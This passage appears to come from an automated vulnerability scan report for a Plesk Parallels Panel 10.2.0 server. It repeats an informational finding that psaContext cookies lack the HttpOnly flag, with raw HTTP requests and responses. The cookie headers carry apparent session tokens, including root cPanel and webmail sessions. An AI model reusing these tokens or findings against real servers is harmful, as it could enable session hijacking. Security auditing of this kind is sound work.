GET /plesk/admin-password/?context=credentials-info HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 19:42:30 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=credentials-info; path=/ Date: Fri, 23 Sep 2011 19:42:30 GMT Server: sw-cp-server Content-Length: 9194
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/domain-summary-report/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/domain-summary-report/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:53:20 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:53:20 GMT Server: sw-cp-server Content-Length: 9186
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/domain@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/domain@any/traffic/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:27:19 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:27:19 GMT Server: sw-cp-server Content-Length: 9102
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/ipaddress@/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/ipaddress@/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:27:12 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:27:12 GMT Server: sw-cp-server Content-Length: 9058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/skeleton/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/skeleton/?cmd=chdir&file=%2F HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/ Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:30:52 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:52 GMT Server: sw-cp-server Content-Length: 22069
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@4/domain@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@4/domain@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@4/domain@any/traffic/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/ Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:54:19 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:54:19 GMT Server: sw-cp-server Content-Length: 9272
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@5/domain@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@5/domain@any/traffic/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:27:13 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:27:13 GMT Server: sw-cp-server Content-Length: 9412
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/ftp-repository/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/ftp-repository/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 16:05:25 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 16:05:25 GMT Server: sw-cp-server Content-Length: 13490
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/ftp-repository/properties/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:13 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:13 GMT Server: sw-cp-server Content-Length: 8796
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/local-repository/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:23 GMT Server: sw-cp-server Content-Length: 25816
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:24 GMT Server: sw-cp-server Content-Length: 11602
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:32:03 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:32:03 GMT Server: sw-cp-server Content-Length: 11595
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:31:27 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:27 GMT Server: sw-cp-server Content-Length: 11607
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=ed9056e995cbfbee61adf45504108ab4; 